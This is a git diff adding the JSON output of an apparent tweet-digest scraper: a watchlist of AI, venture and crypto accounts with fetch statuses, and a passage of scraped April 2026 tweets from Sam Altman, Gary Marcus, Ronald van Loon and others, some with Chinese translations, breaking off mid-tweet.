https://nitter.net/Ronald_vanLoon/status/2048785019083128974#m\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://nitter.net/Jason/status/2048780089295302690#m\n- @Ronald_vanLoon | 2026-04-27T15:00:27+00:00\n - R to @Ronald_vanLoon: Here’s the bottom line: AI won’t be won by who moves fastest. It’ll be won by who governs best. If your data isn’t structured, contextualized, and controlled…\n - https://nitter.net/Ronald_vanLoon/status/2048779312854118829#m\n- @Ronald_vanLoon | 2026-04-27T15:00:26+00:00\n - R to @Ronald_vanLoon: The real bottleneck isn’t models. It’s unstructured data. I saw a side-by-side demo that made this obvious: → Raw data environment • lower accuracy • higher …\n - https://nitter.net/Ronald_vanLoon/status/2048779308794077361#m\n- @Ronald_vanLoon | 2026-04-27T15:00:25+00:00\n - R to @Ronald_vanLoon: The biggest misconception? Speed = progress. In reality: → Teams are innovating faster than they can govern → Outputs are inconsistent and hard to trust → Ri…\n - https://nitter.net/Ronald_vanLoon/status/2048779304683581558#m\n- @Ronald_vanLoon | 2026-04-27T15:00:24+00:00\n - Pinned: Everyone thinks they’re scaling AI. Most are just scaling chaos. What I’m seeing, including in conversations with @collibra, is a dangerous illusion → faster experimentati…\n - https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://nitter.net/elonmusk/status/2048777628019032335#m\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://nitter.net/GaryMarcus/status/2048771044987777428#m\n- @Ronald_vanLoon | 2026-04-27T14:23:11+00:00\n - #AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul? by @measure_plan #ArtificialIntelligence #MachineLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is …\n - https://nitter.net/HarryStebbings/status/2048764741435179442#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://nitter.net/HarryStebbings/status/2048764743205134644#m\n- @Ronald_vanLoon | 2026-04-27T13:45:07+00:00\n - How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intellige…\n - https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_154009.json b/data/x_brief/history/20260427_154009.json new file mode 100644 index 0000000..75ce71d --- /dev/null +++ b/data/x_brief/history/20260427_154009.json @@ -0,0 +1,3127 @@ +{ + "generated_at": "2026-04-27T15:36:53.862287+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/关注列表.md", + "watchers": [ + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "andrejkarpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "lmsqueegie", + "name": "Lars Nielsen" + }, + { + "handle": "david__tian", + "name": "David Tian" + }, + { + "handle": "Bitking_", + "name": "BTCKing" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "Altcoin Buzz" + }, + { + "handle": "TradingGods", + "name": "Trading Gods" + }, + { + "handle": "Warrior_Trading", + "name": "Warrior Trading" + }, + { + "handle": "ProfTrading", + "name": "Profitable Trading" + }, + { + "handle": "SatoshiBun", + "name": "Satoshi" + }, + { + "handle": "直播带逛Tommy", + "name": "Tommy" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "MikeAI", + "name": "Michael" + }, + { + "handle": "Ronald_vanLoon", + "name": "Ronald van Loon" + }, + { + "handle": "erikbryn", + "name": "Erik Brynjolfsson" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "Svwang1", + "name": "王川" + }, + { + "handle": "老胡", + "name": "老胡" + }, + { + "handle": "比特币超级玩家", + "name": "超级玩家" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 248 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T15:36:12.169744+00:00", + "end_utc": "2026-04-27T15:36:53.862287+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 18, + "total_tweets": 248, + "failed_accounts": 4, + "source_hits": { + "nitter": 25 + }, + "source_errors": { + "nitter": 4, + "snscrape": 4, + "rsshub": 4 + } + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Faster Than Human Reflexes: A #Robotic Hand Redefining Speed and Precision\nby @sciencegirl\n \n#Robotics #Engineering #ArtificialIntelligence #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048785019083128974#m", + "published_at": "2026-04-27T15:23:07+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", + "url": "https://nitter.net/elonmusk/status/2048783014075777369#m", + "published_at": "2026-04-27T15:15:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://nitter.net/Jason/status/2048780089295302690#m", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: Here’s the bottom line:\n\nAI won’t be won by who moves fastest.\nIt’ll be won by who governs best.\n\nIf your data isn’t structured, contextualized, and controlled, scaling AI will only amplify problems.\n\nI break this down in detail in my latest video with Collibra.\n\nCheck out the full article: https://www.linkedin.com/pulse/ai-scalingbut-governance-determine-who-wins-ronald-van-loon-ypyne\n\nOr Comment or DM “GOVERNANCE” and I’ll share a practical setup tailored to your organization - so you can define the right governance model before you scale.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779312854118829#m", + "published_at": "2026-04-27T15:00:27+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The real bottleneck isn’t models.\n\nIt’s unstructured data.\n\nI saw a side-by-side demo that made this obvious:\n\n→ Raw data environment\n• lower accuracy\n• higher risk\n• inefficient outputs\n\n→ Metadata-enriched environment\n• better decisions\n• faster results\n• measurable value\n\nSame AI. Completely different outcomes.\n\nThe difference? Governance and structure.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779308794077361#m", + "published_at": "2026-04-27T15:00:26+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The biggest misconception?\n\nSpeed = progress.\n\nIn reality:\n\n→ Teams are innovating faster than they can govern\n→ Outputs are inconsistent and hard to trust\n→ Risk is increasing quietly in the background\n\nWithout a solid data foundation, AI lacks context.\n\nAnd without context, AI is just… guesswork.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779304683581558#m", + "published_at": "2026-04-27T15:00:25+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Pinned: Everyone thinks they’re scaling AI.\n\nMost are just scaling chaos.\n\nWhat I’m seeing, including in conversations with @collibra, is a dangerous illusion\n\n→ faster experimentation\n→ more pilots\n→ zero control\n\nThe gap between AI ambition and actual business value is widening.\n\nHere’s what’s really going on…\n\n#CollibraPartner", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m", + "published_at": "2026-04-27T15:00:24+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://nitter.net/elonmusk/status/2048777628019032335#m", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "#AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul?\nby @measure_plan\n\n#ArtificialIntelligence #MachineLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m", + "published_at": "2026-04-27T14:23:11+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter", + "title_zh": "转推@HarryStebbings:Spotify节目 https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 苹果播客 https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440 YouTube https://youtu.be/dlPCz8Jwypw" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "How poor #Data foundations can undermine #AI success\nby Joanne Carew @CIOonline\n\nLearn more: https://bit.ly/4cGbKSG\n\n#MachineLearning #ArtificialIntelligence #DeepLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m", + "published_at": "2026-04-27T13:45:07+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter", + "title_zh": "⚠️ AI代理是严重不成熟的技术,正在被过快推广。关于AI代理灾难场景的深层教训不在于数据丢失,而在于AI安全性。用户并非完全天真,他认为系统提示和护栏能保护自己,但并未奏效。此次数据丢失,未来可能危及生命" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter", + "title_zh": "期待投资的两个非技术领域:1.冷冻卵子诊所。十年内相信每个21岁女性都会定期冷冻卵子成为常态。极具商业价值:超高客户复购率、超厚利润 2.AI再培训中心。在金丝雀码头设立AI培训中心,与高盛、摩根士丹利等签署协议。这两个都是绝对的金矿" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter", + "title_zh": "我们已更新与微软的合作关系。微软将继续作为我们的主要云合作伙伴,但现在我们能够在所有云平台上提供产品和服务。将继续在2032年前向他们提供模型和产品,并在2030年前分润" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter", + "title_zh": "这太棒了:https://paulgraham.com/kids.html" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00", + "source": "nitter", + "title_zh": "回复@Ronald_vanLoon:第二误解是企业团队总要在开源模型和自有模型间二选一。不需要非此即彼。更聪明的路径是混合架构:→ 自有模型负责规模和通用性 → 开源模型提供灵活性和控制 → 通过协调层按需实时匹配最优模型,实现性能、成本和治理的平衡" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00", + "source": "nitter", + "title_zh": "回复@Ronald_vanLoon:我的核心感悟是,模型正在成为组件而非产品。当下关键在于其配套系统:→ 运行时接口 → 记忆库 → 工具接口 → 协调度逻辑 → 安全执行环境 将模型转化为代理,再使其具备企业级部署能力" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure 